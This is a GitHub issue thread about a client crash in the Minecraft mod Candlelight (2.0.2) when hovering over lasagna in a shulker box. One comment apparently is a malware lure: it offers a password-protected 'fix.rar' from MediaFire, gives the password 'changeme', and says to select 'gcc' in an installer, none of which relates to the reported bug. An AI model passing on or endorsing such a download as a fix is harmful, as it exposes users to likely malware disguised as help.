### ISSUE TITLE
[Candlelight] Lasagna Hover Text Causing Crash

### ISSUE THREAD

**Issue by Zykana** [satisfyu/Let-s-Do-Hub#250]
### Minecraft Version

1.20.1

### Mod

Candlelight

### Mod Version

2.0.2

### Latest Version

- [X] Yes. I'm using the latest Version.

### Issue Description

Client crashes when attempting to hover over lasagna in shulker box.

### Steps to Reproduce

Open shulker box with item, crash.

### Logs

https://pastebin.com/dJHRx0mL

### Minimal Instance Test

- [ ] Yes, I've tested on a minimal instance.

### Check for Similar Issues

- [X] Yes, I have checked for similar issues.

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Zykana** [comment]
> Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."

Link not valid
